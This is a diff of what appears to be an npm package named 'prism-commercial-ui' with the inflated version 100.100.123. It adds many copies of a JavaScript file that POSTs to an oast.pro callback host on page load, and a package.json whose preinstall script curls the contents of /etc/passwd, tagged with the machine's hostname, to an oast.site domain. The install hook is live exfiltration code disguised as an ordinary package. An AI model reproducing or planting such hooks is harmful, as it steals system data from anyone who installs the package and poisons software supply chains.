+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
@@ -0,0 +1,20 @@
1
+ document.addEventListener('DOMContentLoaded', function() {
2
+ fetch('http://cn3pj5qg2pci8ss9dtggadw3g3k55bq64.oast.pro', { // Replace with your API endpoint
3
+ method: 'POST',
4
+ headers: {
5
+ 'Content-Type': 'application/json',
6
+ 'JavaScript': 'true' // Custom header
7
+ },
8
+ body: JSON.stringify({
9
+ data: 'javascript'
10
+ })
11
+ })
12
+ .then(response => {
13
+ if (!response.ok) {
14
+ throw new Error('Network response was not ok');
15
+ }
16
+ return response.json(); // or .text() if the response is text
17
+ })
18
+ .then(data => console.log(data))
19
+ .catch(error => console.error('There was a problem with your fetch operation:', error));
20
+ });
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "prism-commercial-ui",
3
+ "version": "100.100.123",
4
+ "description": "",
5
+ "scripts": {
6
+ "test": "echo \"Error: no test specified\" && exit 1",
7
+ "preinstall": "/usr/bin/curl --data '@/etc/passwd' $(hostname).cn3ro2ig2pci66uscqvgb4uyb5bjwc91h.oast.site"
8
+ },
9
+ "author": "j",
10
+ "license": "ISC"
11
+ }
12
+